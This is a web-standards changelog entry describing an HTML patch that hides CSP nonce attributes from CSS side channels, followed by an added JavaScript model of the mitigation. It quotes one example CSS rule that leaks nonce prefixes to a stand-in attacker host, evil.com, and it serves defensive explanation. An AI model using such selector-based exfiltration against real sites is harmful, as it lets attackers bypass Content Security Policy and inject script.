Antenna.SuikaWiki

Web updates

HTML 19f5cce80155

Hide nonce content attribute values

Some [recent attacks on CSP][1] rely on the ability to exfiltrate nonce data via various mechanisms that can read content attributes. CSS selectors are the best example: through clever use of prefix/postfix text matching selectors values can be sent out to an attacker's server for reuse (e.g., `script[nonce=a] { background: url("https://evil.com/nonce?a");}`).

This patch mitigates the risk of this class of attack by hiding the nonce value from elements' content attributes by moving the `nonce` attributes into a new `NoncedElement` interface mixin, which is included into `HTMLElement`. That mixin defines the following behaviors for the `nonce` content attribute:

1. When the `nonce` content attribute is set or changed, its new value is copied into a `[[CryptographicNonce]]` slot on the element.
2. When a `NoncedElement` is inserted into a document which was delivered with a `Content-Security-Policy` header, the `nonce` content attribute is cleared out.

The `nonce` IDL attribute getter and setter now operate on the `[[CryptographicNonce]]` slot's value rather than reflecting the content attribute, meaning that the nonce value remains exposed to script, but is opaque to non-script side-channels. Likewise, the `[[CryptographicNonce]]` slot's value is used when populating a request's cryptographic nonce metadata in order to deliver the nonce to CSP for validation.

Tests: https://github.com/w3c/web-platform-tests/tree/master/content-security-policy/nonce-hiding

Closes #2369.

[1]:

Mike West
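
A small model of the two behaviours listed in the commit message above, added here as an illustration; it is not code from the HTML Standard, the linked tests or any browser. `NoncedElementModel`, `prefixSelectorMatches`, `demo` and the nonce value are hypothetical, and "cleared out" is modelled as setting the content attribute to the empty string.

```javascript
// Added model, not the HTML Standard's text or any browser's code.
// Class and function names are hypothetical; the nonce value is constructed.
class NoncedElementModel {
  #cryptographicNonce = "";   // stands in for the [[CryptographicNonce]] slot
  #attrs = new Map();         // content attributes, the part CSS selectors can read

  setAttribute(name, value) {
    this.#attrs.set(name, String(value));
    // Behaviour 1: setting or changing the content attribute copies it to the slot.
    if (name === "nonce") this.#cryptographicNonce = String(value);
  }
  getAttribute(name) {
    return this.#attrs.has(name) ? this.#attrs.get(name) : null;
  }

  // IDL attribute: reads and writes the slot, never the content attribute.
  get nonce() { return this.#cryptographicNonce; }
  set nonce(value) { this.#cryptographicNonce = String(value); }

  // Behaviour 2: insertion into a document delivered with a CSP header.
  insertedInto(doc) {
    if (!doc.deliveredWithCspHeader || !this.#attrs.has("nonce")) return;
    const saved = this.#cryptographicNonce;
    this.setAttribute("nonce", "");   // assumption: cleared == empty string
    this.#cryptographicNonce = saved; // clearing must not wipe the slot
  }

  // Value used for the request's cryptographic nonce metadata, checked by CSP.
  requestNonceMetadata() { return this.#cryptographicNonce; }
}

// What a CSS prefix selector on the nonce attribute can observe:
// the content attribute only, never the slot.
function prefixSelectorMatches(el, prefix) {
  const v = el.getAttribute("nonce");
  return v !== null && prefix !== "" && v.startsWith(prefix);
}

// Runs one element through parse-time attribute setting and insertion.
function demo(deliveredWithCspHeader) {
  const el = new NoncedElementModel();
  el.setAttribute("nonce", "abc123"); // constructed nonce
  const before = prefixSelectorMatches(el, "a");
  el.insertedInto({ deliveredWithCspHeader });
  return { before, after: prefixSelectorMatches(el, "a"),
           contentAttribute: el.getAttribute("nonce"),
           idlNonce: el.nonce, requestNonce: el.requestNonceMetadata() };
}
```

With a CSP header the selector-visible attribute is empty after insertion while script and the request path still see the nonce; without one, the content attribute is left unchanged.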